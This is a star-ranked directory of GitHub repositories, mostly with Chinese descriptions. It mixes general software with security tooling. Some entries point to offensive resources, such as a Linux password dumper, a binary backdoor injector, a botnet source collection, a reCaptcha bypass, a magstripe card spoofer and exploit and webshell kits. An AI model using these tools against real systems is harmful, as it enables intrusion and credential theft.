- [**2821**星][3m] [taichi-framework/taichi](https://github.com/taichi-framework/taichi) 一个使用xposed的框架,有或没有Root/解锁引导加载器,支持Android 5.0 ~ 10.0
- [**2817**星][10d] [JS] [cyu/rack-cors](https://github.com/cyu/rack-cors) 用于处理跨源资源共享(CORS)的机架中间件,这使得跨源AJAX成为可能。
- [**2813**星][6m] [JS] [s0md3v/awesomexss](https://github.com/s0md3v/AwesomeXSS) Awesome XSS stuff
- [**2812**星][10d] [C] [vanhoefm/krackattacks-scripts](https://github.com/vanhoefm/krackattacks-scripts) 检测客户端和AP是否受KRACK漏洞影响
- [**2804**星][2y] [HTML] [chybeta/web-security-learning](https://github.com/chybeta/web-security-learning) Web-Security-Learning
- [**2800**星][10d] [C] [meituan-dianping/logan](https://github.com/meituan-dianping/logan) Logan is a lightweight case logging system based on mobile platform.
- [**2794**星][12d] [Py] [hephaest0s/usbkill](https://github.com/hephaest0s/usbkill) 反取证开关. 监控USB端口变化, 有变化时立即关闭计算机
- [**2789**星][10d] [Py] [pwndbg/pwndbg](https://github.com/pwndbg/pwndbg) GDB插件,辅助漏洞开发和逆向
- [**2786**星][12d] [Py] [qiwsir/algorithm](https://github.com/qiwsir/algorithm)
- [**2783**星][10d] [atarity/deploy-your-own-saas](https://github.com/atarity/deploy-your-own-saas) List of "only yours" cloud services for everyday needs
- [**2782**星][2y] [C] [seclab-ucr/intang](https://github.com/seclab-ucr/intang) 为规避来自中国防火墙的“TCP重置攻击”的研究项目(GFW),通过破坏/取消同步审查设备上的TCP控制块(TCB)。
- [**2777**星][7d] [Py] [xmendez/wfuzz](https://github.com/xmendez/wfuzz) Web应用程序fuzzer
- [**2775**星][10d] [onlurking/awesome-infosec](https://github.com/onlurking/awesome-infosec) A curated list of awesome infosec courses and training resources.
- [**2772**星][7d] [HTML] [tikam02/devops-guide](https://github.com/tikam02/devops-guide) DevOps Guide from basic to advanced with Interview Questions and Notes
- [**2770**星][11d] [C] [geohot/qira](https://github.com/geohot/qira) QEMU Interactive Runtime Analyser
- [**2770**星][7m] [ObjC] [kjcracks/clutch](https://github.com/kjcracks/clutch) 快速iOS可执行转储程序
- [**2766**星][10d] [Eagle] [samyk/magspoof](https://github.com/samyk/magspoof) 一种便携式设备,可以“无线”模拟任何磁条、信用卡或酒店卡,甚至在标准的magstripe(非nfc /RFID)读卡器上。它可以禁用芯片和密码,并预测美国运通卡号码与100%的准确性。
- [**2765**星][8d] [C++] [google/zopfli](https://github.com/google/zopfli) 用C语言编写的一个压缩库,性能非常好,但是速度很慢,压缩或zlib压缩
- [**2764**星][10d] [Py] [greenwolf/social_mapper](https://github.com/Greenwolf/social_mapper) 对多个社交网站的用户Profile图片进行大规模的人脸识别
- [**2764**星][12d] [leandromoreira/linux-network-performance-parameters](https://github.com/leandromoreira/linux-network-performance-parameters) 了解一些网络sysctl变量在Linux/内核网络流中的位置
- [**2733**星][4m] [xairy/linux-kernel-exploitation](https://github.com/xairy/linux-kernel-exploitation) Linux 内核 Fuzz 和漏洞利用的资源收集
- [**2729**星][10d] [Java] [jboss-javassist/javassist](https://github.com/jboss-javassist/javassist) Java字节码工程工具包
- [**2725**星][4m] [Shell] [wulabing/v2ray_ws-tls_bash_onekey](https://github.com/wulabing/v2ray_ws-tls_bash_onekey) V2Ray Nginx+vmess+ws+tls/ http2 over tls 一键安装脚本
- [**2724**星][4m] [JS] [popcorn-official/popcorn-desktop](https://github.com/popcorn-official/popcorn-desktop) Popcorn Time is a multi-platform, free software BitTorrent client that includes an integrated media player. Desktop ( Windows / Mac / Linux ) a Butter-Project Fork
- [**2724**星][10d] [PHP] [audi-1/sqli-labs](https://github.com/audi-1/sqli-labs) SQLI labs to test error based, Blind boolean based, Time based.
- [**2723**星][7d] [Py] [ccostan/home-assistantconfig](https://github.com/ccostan/home-assistantconfig)
- [**2716**星][11d] [Ruby] [arachni/arachni](https://github.com/arachni/arachni) Web应用程序安全扫描程序框架
- [**2715**星][10d] [Py] [the0demiurge/shadowsocksshare](https://github.com/the0demiurge/shadowsocksshare) 从ss(r)共享网站爬虫获取共享ss(r)账号,通过解析并校验账号连通性,重新分发账号并生成订阅链接
- [**2713**星][10d] [Go] [xiaoming2028/freepac](https://github.com/xiaoming2028/FreePAC) 科学上网/梯子/自由上网/翻墙 SS/SSR/V2Ray/Brook 搭建教程
- [**2713**星][10d] [Go] [xiaoming2028/freepac](https://github.com/xiaoming2028/FreePAC) 科学上网/梯子/自由上网/翻墙 SS/SSR/V2Ray/Brook 搭建教程
- [**2709**星][5y] [Java] [linyiqun/dataminingalgorithm](https://github.com/linyiqun/dataminingalgorithm) 数据挖掘18大算法实现以及其他相关经典DM算法
- [**2703**星][14d] [C] [ckolivas/cgminer](https://github.com/ckolivas/cgminer) ASIC and FPGA miner in c for bitcoin
- [**2696**星][10d] [Py] [ab77/netflix-proxy](https://github.com/ab77/netflix-proxy) 用于看Netflix/HBO视频的智能DNS代理
- [**2695**星][10d] [C] [huntergregal/mimipenguin](https://github.com/huntergregal/mimipenguin) dump 当前Linux用户的登录密码
- [**2688**星][11d] [C++] [fanout/pushpin](https://github.com/fanout/pushpin) 使用C ++编写的反向代理服务器,可以轻松实现WebSocket,HTTP流和HTTP长轮询服务
- [**2686**星][7d] [Py] [ctfd/ctfd](https://github.com/CTFd/CTFd) CTFs as you need them
- [**2685**星][10d] [Go] [ne0nd0g/merlin](https://github.com/ne0nd0g/merlin) 用golang编写的一个跨平台的后渗透,HTTP/2命令与控制服务器和代理。
- [**2683**星][10d] [C] [tsl0922/ttyd](https://github.com/tsl0922/ttyd) 通过web共享您的终端
- [**2680**星][10d] [C] [martin-ger/esp_wifi_repeater](https://github.com/martin-ger/esp_wifi_repeater) 一个功能齐全的WiFi中继器
- [**2677**星][10d] [C++] [domoticz/domoticz](https://github.com/domoticz/domoticz) 监控和配置各种设备,如:灯,开关,各种传感器/米,如温度,雨,风,紫外线,电力,煤气,水和更多
- [**2676**星][7d] [C] [wireshark/wireshark](https://github.com/wireshark/wireshark) Wireshark的Git存储库的只读镜像
- [**2662**星][9m] [Java] [teevity/ice](https://github.com/teevity/ice) AWS使用工具
- [**2660**星][10d] [TSQL] [rapid7/metasploitable3](https://github.com/rapid7/metasploitable3) 从头开始构建的具有大量安全漏洞的VM。
- [**2659**星][12d] [facert/python-data-structure-cn](https://github.com/facert/python-data-structure-cn) problem-solving-with-algorithms-and-data-structure-using-python 中文版
- [**2655**星][5m] [Shell] [medicean/vulapps](https://github.com/medicean/vulapps) 快速搭建各种漏洞环境(Various vulnerability environment)
- [**2653**星][10d] [Py] [pritunl/pritunl](https://github.com/pritunl/pritunl) 企业VPN服务器
- [**2653**星][10d] [Py] [lionsec/katoolin](https://github.com/lionsec/katoolin) 在非Kali系统上自动化安装Kali工具
- [**2651**星][4m] [Swift] [zhuhaow/nekit](https://github.com/zhuhaow/nekit) 一个网络扩展框架的工具包
- [**2651**星][8y] [C] [id-software/quake](https://github.com/id-software/quake) Quake GPL源代码
- [**2647**星][6m] [Go] [owasp/amass](https://github.com/owasp/amass) 帮助信息安全专业人员执行攻击表面的网络映射,并使用开源信息收集和主动侦察技术执行外部资产发现。
- [**2647**星][10d] [C#] [openhardwaremonitor/openhardwaremonitor](https://github.com/openhardwaremonitor/openhardwaremonitor) Open Hardware Monitor
- [**2646**星][6m] [Go] [drk1wi/modlishka](https://github.com/drk1wi/modlishka) 一个强大而灵活的HTTP反向代理
- [**2644**星][15d] [JS] [h2non/toxy](https://github.com/h2non/toxy) 用于弹性测试和模拟网络条件的可破解HTTP代理
- [**2640**星][5m] [Shell] [rebootuser/linenum](https://github.com/rebootuser/linenum) 脚本化的本地Linux枚举和特权升级检查
- [**2637**星][6m] [JS] [knownsec/kcon](https://github.com/knownsec/kcon) 一个著名的黑客会议,由Knownsec团队组织
- [**2629**星][11d] [Java] [google/binnavi](https://github.com/google/binnavi) 二进制分析IDE, 对反汇编代码的控制流程图和调用图进行探查/导航/编辑/注释.(IDA插件的作用是导出反汇编)
- [**2617**星][2y] [Py] [ecthros/uncaptcha](https://github.com/ecthros/uncaptcha) 绕过谷歌 “I'mnot a robot”reCaptcha 验证,准确率达85%
- [**2612**星][1y] [JS] [skidding/illustrated-algorithms](https://github.com/skidding/illustrated-algorithms) Interactive algorithm visualizations
- [**2609**星][10d] [HTML] [dirtycow/dirtycow.github.io](https://github.com/dirtycow/dirtycow.github.io) Dirty COW
- [**2608**星][3m] [Py] [0xinfection/awesome-waf](https://github.com/0xinfection/awesome-waf) Everything awesome about web application firewalls (WAFs).
- [**2596**星][10d] [offensive-security/kali-nethunter](https://github.com/offensive-security/kali-nethunter) Kali NetHunter项目
- [**2588**星][4m] [C] [yrutschle/sslh](https://github.com/yrutschle/sslh) 应用协议多路复用器(例如,在同一端口上共享SSH和HTTPS)。接受指定端口上的连接,并根据对第一个数据包的测试结果将其转发
- [**2585**星][10d] [Go] [42wim/matterbridge](https://github.com/42wim/matterbridge) bridge between mattermost, IRC, gitter, xmpp, slack, discord, telegram, rocketchat, steam, twitch, ssh-chat, zulip, whatsapp, keybase, matrix, microsoft teams and more with REST API (mattermost not required!)
- [**2584**星][10d] [Shell] [v1s1t0r1sh3r3/airgeddon](https://github.com/v1s1t0r1sh3r3/airgeddon) 一个用于Linux系统审计无线网络的多用途bash脚本
- [**2584**星][10d] [Go] [aquasecurity/kube-bench](https://github.com/aquasecurity/kube-bench) 检查Kubernetes是否按照CIS Kubernetes基准中定义的安全最佳实践进行部署
- [**2579**星][12d] [Py] [x0rz/tweets_analyzer](https://github.com/x0rz/tweets_analyzer) Tweets元数据刮刀和活动分析仪
- [**2579**星][1y] [ObjC] [nygard/class-dump](https://github.com/nygard/class-dump) 从Mach-O文件生成Objective-C头文件
- [**2577**星][11d] [Go] [xtaci/kcp-go](https://github.com/xtaci/kcp-go) 通过UDP数据包提供流畅、有弹性、有序、错误检查和匿名传输流,
- [**2576**星][11d] [Py] [google/nogotofail](https://github.com/google/nogotofail) 帮助开发人员和安全研究人员在设备和应用程序上发现并修复弱TLS / SSL连接问题,定位敏感的明文流量。灵活、可扩展、功能强大
- [**2574**星][10d] [nahamsec/resources-for-beginner-bug-bounty-hunters](https://github.com/nahamsec/resources-for-beginner-bug-bounty-hunters) A list of resources for those interested in getting started in bug bounties
- [**2574**星][7d] [C] [mintty/wsltty](https://github.com/mintty/wsltty) Mintty作为Windows / WSL上Ubuntu上Bash的终端
- [**2573**星][6m] [Py] [ysrc/xunfeng](https://github.com/ysrc/xunfeng) 巡风是一款适用于企业内网的漏洞快速应急,巡航扫描系统。
- [**2564**星][11d] [JS] [infobyte/faraday](https://github.com/infobyte/faraday) 渗透测试和漏洞管理平台
- [**2560**星][8m] [kbandla/aptnotes](https://github.com/kbandla/aptnotes) Various public documents, whitepapers and articles about APT campaigns
- [**2560**星][11d] [Py] [geekan/scrapy-examples](https://github.com/geekan/scrapy-examples) Multifarious Scrapy examples. Spiders for alexa / amazon / douban / douyu / github / linkedin etc.
- [**2559**星][10d] [Py] [arthepsy/ssh-audit](https://github.com/arthepsy/ssh-audit) SSH server auditing (banner, key exchange, encryption, mac, compression, compatibility, security, etc)
- [**2559**星][4m] [C#] [stocksharp/stocksharp](https://github.com/stocksharp/stocksharp) 算法交易和量化交易开源平台,开发交易机器人(股票市场、外汇、加密、比特币和期权)。
- [**2548**星][15d] [evilsocket/bettercap](https://github.com/evilsocket/bettercap) 中间人攻击框架,功能完整,模块化设计,轻便且易于扩展。
- [**2537**星][10d] [C] [moby/hyperkit](https://github.com/moby/hyperkit) 用于在应用程序中嵌入管理程序功能的工具包
- [**2535**星][3m] [Java] [m66b/netguard](https://github.com/m66b/netguard) 一个简单的方法来阻止特定应用程序访问互联网
- [**2533**星][12d] [C++] [pavel-odintsov/fastnetmon](https://github.com/pavel-odintsov/fastnetmon) 快速 DDoS 检测/分析工具,支持 sflow/netflow/mirror
- [**2526**星][1y] [C#] [yck1509/confuserex](https://github.com/yck1509/confuserex) 一个开源的。net应用程序的免费保护器
- [**2524**星][3m] [PHP] [misp/misp](https://github.com/misp/misp) 开源威胁情报共享平台
- [**2522**星][3y] [C] [dhavalkapil/icmptunnel](https://github.com/dhavalkapil/icmptunnel) 透明隧道您的IP流量通过ICMP的回声和答复包。
- [**2514**星][10d] [Rust] [cloudflare/boringtun](https://github.com/cloudflare/boringtun) WireGuard®协议的一种实现,旨在提高可移植性和速度。
- [**2513**星][10d] [JS] [pa11y/pa11y](https://github.com/pa11y/pa11y) 自动可访问性测试伙伴
- [**2505**星][4m] [JS] [vitaly-t/pg-promise](https://github.com/vitaly-t/pg-promise) 用于Node.js的PostgreSQL接口
- [**2505**星][10d] [JS] [thlorenz/proxyquire](https://github.com/thlorenz/proxyquire) 为了在测试过程中轻松地重写依赖项,同时保持完全不引人注目,nodejs的需求。
- [**2504**星][8d] [JS] [weixin/miaow](https://github.com/weixin/Miaow) A set of plugins for Sketch include drawing links & marks, UI Kit & Color sync, font & text replacing.
- [**2503**星][1y] [C++] [chengr28/pcap_dnsproxy](https://github.com/chengr28/pcap_dnsproxy) 基于包捕获的本地DNS服务器
- [**2502**星][2y] [Py] [feross/spoofmac](https://github.com/feross/spoofmac) 伪造MAC地址(OS X, Windows, Linux)
- [**2500**星][5m] [C] [hfiref0x/uacme](https://github.com/hfiref0x/uacme) 击败Windows用户帐户控制
- [**2494**星][3m] [Py] [bowenpay/wechat-spider](https://github.com/bowenpay/wechat-spider) 微信公众号爬虫
- [**2490**星][12d] [Go] [syncsynchalt/illustrated-tls](https://github.com/syncsynchalt/illustrated-tls) The Illustrated TLS Connection: Every byte explained
- [**2490**星][11d] [C++] [ggerganov/kbd-audio](https://github.com/ggerganov/kbd-audio) 利用麦克风捕捉到的音频, 分析键盘敲击的按键
- [**2488**星][6m] [yeyintminthuhtut/awesome-red-teaming](https://github.com/yeyintminthuhtut/awesome-red-teaming) List of Awesome Red Teaming Resources
- [**2485**星][2m] [Py] [google/enjarify](https://github.com/google/enjarify) 将Dalvik字节码转换为对应的Java字节码
- [**2482**星][5m] [C] [haad/proxychains](https://github.com/haad/proxychains) 强制任何给定应用程序建立的任何TCP连接通过代理(如TOR或任何其他SOCKS4、SOCKS5或HTTP(S)代理)执行。
- [**2475**星][14d] [Py] [secretsquirrel/the-backdoor-factory](https://github.com/secretsquirrel/the-backdoor-factory) 为PE, ELF, Mach-O二进制文件添加Shellcode后门
- [**2474**星][4m] [Py] [wistbean/learn_python3_spider](https://github.com/wistbean/learn_python3_spider) python爬虫教程系列、从0到1学习python爬虫,包括浏览器抓包,手机APP抓包,如 fiddler、mitmproxy,各种爬虫涉及的模块的使用
- [**2474**星][10d] [Java] [genymobile/gnirehtet](https://github.com/genymobile/gnirehtet) 为Android提供了反向连接
- [**2468**星][10d] [Py] [guohongze/adminset](https://github.com/guohongze/adminset) 自动化运维平台:CMDB、CD、DevOps、资产管理、任务编排、持续交付、系统监控、运维管理、配置管理
- [**2467**星][3y] [rpisec/malware](https://github.com/rpisec/malware) Course materials for Malware Analysis by RPISEC
- [**2458**星][3m] [PS] [k8gege/k8tools](https://github.com/k8gege/k8tools) K8工具合集(内网渗透/提权工具/远程溢出/漏洞利用/扫描工具/密码破解/免杀工具/Exploit/APT/0day/Shellcode/Payload/priviledge/BypassUAC/OverFlow/WebShell/PenTest) Web GetShell Exploit(Struts2/Zimbra/Weblogic/Tomcat/Apache/Jboss/DotNetNuke/zabbix)
- [**2453**星][10d] [C++] [google/bloaty](https://github.com/google/bloaty) 二进制文件的大小分析器
- [**2452**星][4m] [Java] [mock-server/mockserver](https://github.com/mock-server/mockserver) MockServer enables easy mocking of any system you integrate with via HTTP or HTTPS with clients written in Java, JavaScript and Ruby. MockServer also includes a proxy that introspects all proxied traffic including encrypted SSL traffic and supports Port Forwarding, Web Proxying (i.e. HTTP proxy), HTTPS Tunneling Proxying (using HTTP CONNECT) and…
- [**2452**星][4m] [Java] [mock-server/mockserver](https://github.com/mock-server/mockserver) 轻松模拟任何通过HTTP或HTTPS与用Java、JavaScript和Ruby编写的客户端集成的系统。
- [**2443**星][10d] [Java] [csploit/android](https://github.com/csploit/android) Android上最完整、最先进的IT安全专业工具包。
- [**2440**星][10d] [edoverflow/bugbounty-cheatsheet](https://github.com/edoverflow/bugbounty-cheatsheet) A list of interesting payloads, tips and tricks for bug bounty hunters.
- [**2434**星][4m] [Shell] [eliaskotlyar/xiaomi-dafang-hacks](https://github.com/eliaskotlyar/xiaomi-dafang-hacks) 小米DaFang Hacks / XiaoFang 1S / Wyzecam V2 / Wyzecam Pan /其他T20设备
- [**2432**星][11d] [sobolevn/awesome-cryptography](https://github.com/sobolevn/awesome-cryptography) A curated list of cryptography resources and links.
- [**2432**星][10d] [JS] [retirejs/retire.js](https://github.com/retirejs/retire.js) 扫描器检测使用JavaScript库已知的漏洞
- [**2432**星][12d] [TeX] [crypto101/book](https://github.com/crypto101/book) 密码101,密码学的入门书
- [**2431**星][4m] [security-onion-solutions/security-onion](https://github.com/security-onion-solutions/security-onion) 用于威胁查找、企业安全监视和日志管理的Linux发行版
- [**2431**星][3y] [Py] [rootphantomer/blasting_dictionary](https://github.com/rootphantomer/blasting_dictionary) 爆破字典
- [**2431**星][10d] [goq/telegram-list](https://github.com/goq/telegram-list) List of telegram groups, channels & bots // Список интересных групп, каналов и ботов телеграма // Список чатов для программистов
- [**2431**星][10d] [getlantern/lantern-binaries](https://github.com/getlantern/lantern-binaries) Lantern installers binary downloads.
- [**2427**星][7d] [Py] [novnc/websockify](https://github.com/novnc/websockify) Websockify is a WebSocket to TCP proxy/bridge. This allows a browser to connect to any application/server/service. Implementations in Python, C, Node.js and Ruby.
- [**2413**星][1y] [hack-with-github/free-security-ebooks](https://github.com/hack-with-github/free-security-ebooks) Free Security and Hacking eBooks
- [**2411**星][12d] [Lua] [snabbco/snabb](https://github.com/snabbco/snabb) 网络工具包,简单、快速
- [**2407**星][1y] [ObjC] [evgenykarkan/ekalgorithms](https://github.com/evgenykarkan/ekalgorithms) EKAlgorithms contains some well known CS algorithms & data structures.
- [**2406**星][11d] [PHP] [kint-php/kint](https://github.com/kint-php/kint) a powerful and modern PHP debugging tool.
- [**2405**星][10d] [Shell] [toniblyx/prowler](https://github.com/toniblyx/prowler) 一个执行AWS安全最佳实践评估、审计、事件响应、持续监控、加强和取证准备的安全工具。
- [**2405**星][14d] [OCaml] [facebookarchive/pfff](https://github.com/facebookarchive/pfff) 一堆工具的集合,用于执行静态分析、代码可视化、代码导航、保持格式的源码转换(例如:源码重构)。完美支持C、Java、JS、PHP,后续将支持其他一大堆语言。
- [**2397**星][10d] [Py] [therook/subbrute](https://github.com/therook/subbrute) DNS meta查询爬虫,枚举DNS记录和子域名
- [**2396**星][10d] [Py] [rll/rllab](https://github.com/rll/rllab) rllab is a framework for developing and evaluating reinforcement learning algorithms, fully compatible with OpenAI Gym.
- [**2396**星][10d] [gbdev/awesome-gbdev](https://github.com/gbdev/awesome-gbdev) A curated list of Game Boy development resources such as tools, docs, emulators, related projects and open-source ROMs.
- [**2395**星][10d] [C] [stlink-org/stlink](https://github.com/stlink-org/stlink) 开源版本的STMicroelectronics Stlink调试器和编程器
- [**2393**星][10d] [Go] [google/mtail](https://github.com/google/mtail) 从应用程序日志中提取whitebox监视数据,以便在timeseries数据库中收集
- [**2391**星][10m] [Go] [mlabouardy/komiser](https://github.com/mlabouardy/komiser) :通过发现隐藏的成本,监控支出的增加,并根据客户的建议做出有影响的改变,保持在预算之下。
- [**2389**星][10d] [Py] [lmacken/pyrasite](https://github.com/lmacken/pyrasite) 向运行中的 Python进程注入代码
- [**2388**星][2m] [C] [stefanesser/dumpdecrypted](https://github.com/stefanesser/dumpdecrypted) 转储解密的macho文件从加密的iPhone应用程序从内存到磁盘。
- [**2388**星][10d] [C] [armmbed/mbedtls](https://github.com/armmbed/mbedtls) 一个开源的、可移植的、易于使用的、可读的、灵活的SSL库
- [**2386**星][10d] [JS] [dcodeio/bcrypt.js](https://github.com/dcodeio/bcrypt.js) Optimized bcrypt in plain JavaScript with zero dependencies.
- [**2386**星][8d] [Shell] [pirate/wireguard-docs](https://github.com/pirate/wireguard-docs) 用于WireGuard的API参考指南,包括设置、配置和使用,以及示例。
- [**2386**星][2y] [Py] [danmcinerney/lans.py](https://github.com/danmcinerney/lans.py) 注入代码并监视wifi用户
- [**2385**星][12d] [JS] [pedant/safe-java-js-webview-bridge](https://github.com/pedant/safe-java-js-webview-bridge) 为WebView中的Java与JavaScript提供【安全可靠】的多样互通方案
- [**2385**星][10d] [Go] [projectdiscovery/subfinder](https://github.com/projectdiscovery/subfinder) Subfinder is a subdomain discovery tool that discovers valid subdomains for websites. Designed as a passive framework to be useful for bug bounties and safe for penetration testing.
- [**2385**星][10d] [JS] [talkingdata/inmap](https://github.com/talkingdata/inmap) 大数据地理可视化
- [**2367**星][10d] [tylerha97/awesome-reversing](https://github.com/tylerha97/awesome-reversing) A curated list of awesome reversing resources
- [**2358**星][8d] [Go] [vuvuzela/vuvuzela](https://github.com/vuvuzela/vuvuzela) 隐藏元数据的私有消息传递系统
- [**2357**星][10d] [Py] [pycqa/bandit](https://github.com/pycqa/bandit) 在Python代码中查找常见的安全问题
- [**2356**星][1y] [microsoftedge/msedge](https://github.com/microsoftedge/msedge) 微软Edge和Chromium开源:我们的意图
- [**2348**星][11d] [Py] [elceef/dnstwist](https://github.com/elceef/dnstwist) 域名置换引擎,用于检测打字错误,网络钓鱼和企业间谍活动
- [**2348**星][10d] [C] [alexaltea/orbital](https://github.com/alexaltea/orbital) 实验ps4模拟器
- [**2341**星][10d] [Assembly] [pret/pokered](https://github.com/pret/pokered) 口袋妖怪红/蓝反汇编
- [**2340**星][3m] [C#] [dotnetcore/dotnetspider](https://github.com/dotnetcore/dotnetspider) DotnetSpider, a .NET Standard web crawling library. It is lightweight, efficient and fast high-level web crawling & scraping framework
- [**2335**星][13d] [C] [abrasive/shairport](https://github.com/abrasive/shairport) Airtunes模拟器
- [**2333**星][10d] [Go] [mmatczuk/go-http-tunnel](https://github.com/mmatczuk/go-http-tunnel) 通过HTTP/2的快速且安全的隧道
- [**2331**星][11d] [dumb-password-rules/dumb-password-rules](https://github.com/dumb-password-rules/dumb-password-rules) 用愚蠢的密码规则羞辱网站。
- [**2327**星][10d] [JS] [jcubic/jquery.terminal](https://github.com/jcubic/jquery.terminal) jQuery终端仿真器-基于web的终端
- [**2320**星][10d] [Go] [solo-io/gloo](https://github.com/solo-io/gloo) 基于Envoy构建的特性丰富的、kubernets原生的下一代API网关
- [**2317**星][3m] [C] [aurorawright/luma3ds](https://github.com/aurorawright/luma3ds) Noob-proof (N)3DS“定制固件”
- [**2308**星][10d] [swiftonsecurity/sysmon-config](https://github.com/swiftonsecurity/sysmon-config) 具有默认高质量事件跟踪的Sysmon配置文件模板
- [**2299**星][3m] [C#] [hmbsbige/shadowsocksr-windows](https://github.com/hmbsbige/shadowsocksr-windows) ShadowsocksR for Windows
- [**2292**星][12d] [Py] [commixproject/commix](https://github.com/commixproject/commix) Automated All-in-One OS command injection and exploitation tool.
- [**2285**星][9m] [C#] [microsoft/git-credential-manager-for-windows](https://github.com/microsoft/git-credential-manager-for-windows) 支持Visual Studio Team Services、GitHub和Bitbucket多因素身份验证,为Windows提供安全的Git凭据存储
- [**2280**星][10d] [Go] [goodrain/rainbond](https://github.com/goodrain/rainbond) 以企业云原生应用开发、架构、运维、共享、交付为核心的Kubernetes多云赋能平台
- [**2279**星][11d] [Py] [datasploit/datasploit](https://github.com/DataSploit/datasploit) 对指定目标执行多种侦查技术:企业、人、电话号码、比特币地址等
- [**2278**星][10d] [C++] [weidai11/cryptopp](https://github.com/weidai11/cryptopp) 免费c++类库的密码方案
- [**2275**星][11d] [PHP] [antonioribeiro/tracker](https://github.com/antonioribeiro/tracker) 跟踪器从您的请求中收集大量信息以识别和存储
- [**2270**星][3y] [Go] [mehrdadrad/mylg](https://github.com/mehrdadrad/mylg) 网络诊断工具
- [**2269**星][3y] [Java] [jackpal/android-terminal-emulator](https://github.com/jackpal/android-terminal-emulator) A VT-100 terminal emulator for the Android OS
- [**2269**星][10d] [Py] [whaleshark-team/cobra](https://github.com/WhaleShark-Team/cobra) Source Code Security Audit (源代码安全审计)
- [**2266**星][10d] [Py] [jinfagang/weibo_terminater](https://github.com/jinfagang/weibo_terminater) Final Weibo Crawler Scrap Anything From Weibo, comments, weibo contents, followers, anything. The Terminator
- [**2266**星][12d] [Py] [scrapy-plugins/scrapy-splash](https://github.com/scrapy-plugins/scrapy-splash) 用于JavaScript集成的Scrapy+Splash
- [**2263**星][10d] [qazbnm456/awesome-cve-poc](https://github.com/qazbnm456/awesome-cve-poc) CVE PoC列表
- [**2262**星][10d] [exakat/php-static-analysis-tools](https://github.com/exakat/php-static-analysis-tools) A reviewed list of useful PHP static analysis tools
- [**2262**星][5m] [JS] [cure53/h5sc](https://github.com/cure53/h5sc) HTML5 Security Cheatsheet - A collection of HTML5 related XSS attack vectors
- [**2261**星][10d] [Go] [projectcontour/contour](https://github.com/projectcontour/contour) Contour is a Kubernetes ingress controller using Lyft's Envoy proxy.
- [**2260**星][3m] [hmaverickadams/beginner-network-pentesting](https://github.com/hmaverickadams/beginner-network-pentesting) 初学者网络渗透课程笔记
- [**2259**星][11d] [Rust] [ebtech/rust-algorithms](https://github.com/ebtech/rust-algorithms) Common data structures and algorithms in Rust
- [**2259**星][3m] [selierlin/share-ssr-v2ray](https://github.com/selierlin/share-ssr-v2ray) 解决科学上网问题
- [**2245**星][11d] [C++] [maestron/botnets](https://github.com/maestron/botnets) This is a collection of #botnet source codes, unorganized. For EDUCATIONAL PURPOSES ONLY
- [**2244**星][12d] [HTML] [kjur/jsrsasign](https://github.com/kjur/jsrsasign) The 'jsrsasign' (RSA-Sign JavaScript Library) is an opensource free cryptography library supporting RSA/RSAPSS/ECDSA/DSA signing/validation, ASN.1, PKCS#1/5/8 private/public key, X.509 certificate, CRL, OCSP, CMS SignedData, TimeStamp, CAdES JSON Web Signature/Token in pure JavaScript.
- [**2243**星][8d] [PHP] [serghey-rodin/vesta](https://github.com/serghey-rodin/vesta) VESTA控制面板
- [**2242**星][4m] [HTML] [gtfobins/gtfobins.github.io](https://github.com/gtfobins/gtfobins.github.io) Curated list of Unix binaries that can be exploited to bypass system security restrictions
- [**2240**星][11d] [Go] [shiyanhui/dht](https://github.com/shiyanhui/dht) BitTorrent DHT协议& DHT Spider。
- [**2240**星][5y] [Go] [filosottile/heartbleed](https://github.com/filosottile/heartbleed) CVE-2014-0160的检查程序(站点和工具)
- [**2240**星][10d] [Go] [eth0izzle/shhgit](https://github.com/eth0izzle/shhgit) 监听Github Event API,实时查找Github代码和Gist中的secret和敏感文件
- [**2238**星][10d] [C] [flatpak/flatpak](https://github.com/flatpak/flatpak) 用于在Linux上构建、分发和运行沙箱桌面应用程序的系统。
- [**2236**星][3m] [Java] [elderdrivers/edxposed](https://github.com/elderdrivers/edxposed) Riru模块试图提供一个ART挂钩框架(最初用于Android Pie),它提供与OG xpose一致的api,利用YAHFA(或SandHook)挂钩框架,支持Android 8.0 ~ 10。
- [**2231**星][12d] [JS] [emadehsan/thal](https://github.com/emadehsan/thal) Getting started with Puppeteer and Chrome Headless for Web Scraping
- [**2230**星][12d] [PHP] [jeremykenedy/laravel-auth](https://github.com/jeremykenedy/laravel-auth) Laravel 7 with user authentication, registration with email confirmation, social media authentication, password recovery, and captcha protection. Uses offical [Bootstrap 4](
- [**2230**星][5m] [infoslack/awesome-web-hacking](https://github.com/infoslack/awesome-web-hacking) A list of web application security
- [**2228**星][10d] [Py] [xuefenghuang/lianjia-scrawler](https://github.com/xuefenghuang/lianjia-scrawler) 链家二手房租房在线数据,存量房交易服务平台数据,详细数据分析教程
- [**2220**星][4m] [Py] [fortynorthsecurity/eyewitness](https://github.com/FortyNorthSecurity/EyeWitness) 给网站做快照,提供服务器Header信息,识别默认凭证等
- [**2220**星][10d] [C++] [codebutler/firesheep](https://github.com/codebutler/firesheep) 演示HTTP会话劫持攻击的Firefox扩展
- [**2218**星][11d] [ObjC] [ios-control/ios-deploy](https://github.com/ios-control/ios-deploy) Install and debug iPhone apps from the command line, without using Xcode
- [**2218**星][12d] [C] [cleanflight/cleanflight](https://github.com/cleanflight/cleanflight) 清理代码版本的基本飞行控制器固件
- [**2215**星][12d] [Shell] [foospidy/payloads](https://github.com/foospidy/payloads) web 攻击 Payload 集合
- [**2209**星][10d] [Py] [bisguzar/twitter-scraper](https://github.com/bisguzar/twitter-scraper) Twitter爬虫, 利用Twitter前端API
- [**2209**星][4m] [Py] [trustedsec/unicorn](https://github.com/trustedsec/unicorn) 通过PowerShell降级攻击, 直接将Shellcode注入到内存
- [**2207**星][12d] [C] [yarrick/pingfs](https://github.com/yarrick/pingfs) Stores your data in ICMP ping packets
- [**2207**星][11d] [Go] [theupdateframework/notary](https://github.com/theupdateframework/notary) 允许任何人对任意数据集合具有信任的项目
- [**2207**星][7d] [Py] [derv82/wifite2](https://github.com/derv82/wifite2) 无线网络审计工具wifite 的升级版/重制版
- [**2205**星][11d] [Go] [ullaakut/cameradar](https://github.com/Ullaakut/cameradar) 侵入RTSP视频监控摄像头
- [**2204**星][11d] [Java] [alibaba/alink](https://github.com/alibaba/alink) Alink is the Machine Learning algorithm platform based on Flink, developed by the PAI team of Alibaba computing platform.
- [**2203**星][4m] [Ruby] [urbanadventurer/whatweb](https://github.com/urbanadventurer/whatweb) 下一代web扫描器
- [**2201**星][10d] [djadmin/awesome-bug-bounty](https://github.com/djadmin/awesome-bug-bounty) A comprehensive curated list of available Bug Bounty & Disclosure Programs and Write-ups.
